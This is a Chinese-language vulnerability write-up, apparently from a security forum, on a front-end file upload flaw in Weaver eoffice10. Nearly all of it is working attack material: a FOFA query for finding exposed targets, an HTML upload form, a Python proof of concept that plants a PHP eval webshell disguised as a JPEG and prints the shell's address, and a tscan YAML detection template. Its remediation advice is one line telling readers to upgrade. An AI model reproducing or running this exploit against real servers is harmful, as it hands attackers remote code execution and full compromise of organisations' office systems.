一、漏洞详情
2022年护网期间公开漏洞显示泛微eoffice10前台存在文件上传漏洞可getshell
二、漏洞影响范围
漏洞影响的产品版本包括:泛微oeoffice10
三、漏洞复现
使用 fofa搜索
title=“eoffice10”
构造html页面
<form method='post'
action='http://xx.xx.xx.xx:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
enctype="multipart/form-data" >
<input type="file" name="FileData"/></br></br>
<input type="text" name="FormData" value="{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'teststcs.php'}"/></br></br>
<button type=submit value="上传">上传</button> </form>将action 部分替换为目标地址
打开网页即可上传php脚本文件获取webshell
编写漏洞POC
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @userVersion : python 3.7
# @Author : fsrm
# @Data : 2022/08/08
# @Effect : temp
# @Version : V1.1
import json
import sys
from urllib.parse import urlsplit
import requests
Header={
'Content-Length': '397',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'Origin': 'null',
# 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundarypgyxaBmmbboTooNw',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36',
'Accept-Language': 'zh-CN',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
'Sec-GPC': '1',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close'
}
# proxies = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }
def checkversion(baseurl):
versionurl = baseurl + "/eoffice10/version.json"
try:
r=requests.get(versionurl,verify=False, timeout=10)
jsonres=json.loads(r.text)
if jsonres['version']==10:
# print(jsonres)
return True
else:
return False
except Exception as e:
print(str(e))
return False
def postdata(baseurl):
posturl=baseurl+"/eoffice10/server/public/iWebOffice2015/OfficeServer.php"
files={
"FileData": ("1.jpg", "<?php echo(md5(cde4f31a5));@eval($_POST[stcs]);?>","image/jpeg"),
"FormData": (None, "{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'cde4f31a5.php'}")
}
# r=requests.post(posturl,data=None,headers=Header,files=files,proxies=proxies)
r = requests.post(posturl, data=None, headers=Header, files=files,verify=False, timeout=10)
return
def checkresult(baseurl):
checkurl=baseurl+"/eoffice10/server/public/iWebOffice2015/Document/cde4f31a5.php"
# print(checkurl)
r=requests.get(checkurl,verify=False, timeout=10)
if "4e700eabf8fc3788516fb02c5d4e38e2" in r.text:
print("[+]存在漏洞 shell地址:"+checkurl)
else:
print("[-] 不存在漏洞")
def main(url):
result = urlsplit(url)
basetarget=result.scheme+"://"+result.netloc
# print(basetarget)
versionres=checkversion(basetarget)
if versionres==False:
print("不存在漏洞")
return
# 上传文件
postdata(basetarget)
# 验证结果
checkresult(basetarget)
if __name__ == '__main__':
if len(sys.argv)>1:
url=sys.argv[1]
main(url)
else:
print("usg: python eoffice10upload.py http://xxxxxxxx")执行结果
tscan poc
params: []
name: fanwei_eoffice10_getshell_2022.08
set:
randstr: randomLowercase(10)
randint: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8vJ2eQQn6YZjc9Zm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/104.0.5112.81 Safari/537.36
body: |-
------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
Content-Disposition: form-data; name="FileData"; filename="1.jpg"
Content-Type: image/jpeg
<?php echo(md5({{randint}}));?>
------WebKitFormBoundary8vJ2eQQn6YZjc9Zm
Content-Disposition: form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{randstr}}.php'}
------WebKitFormBoundary8vJ2eQQn6YZjc9Zm--
search: ""
followredirects: false
expression: response.status==200
- method: GET
path: /eoffice10/server/public/iWebOffice2015/Document/{{randstr}}.php
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status==200 && response.body.bcontains(bytes(substr(md5(string(randint)),0,
31)))
groups: {}
detail:
author: ""
links: []
description: ""
version: ""
四、漏洞处置建议
尽快升级到最新版本。
请登录后查看回复内容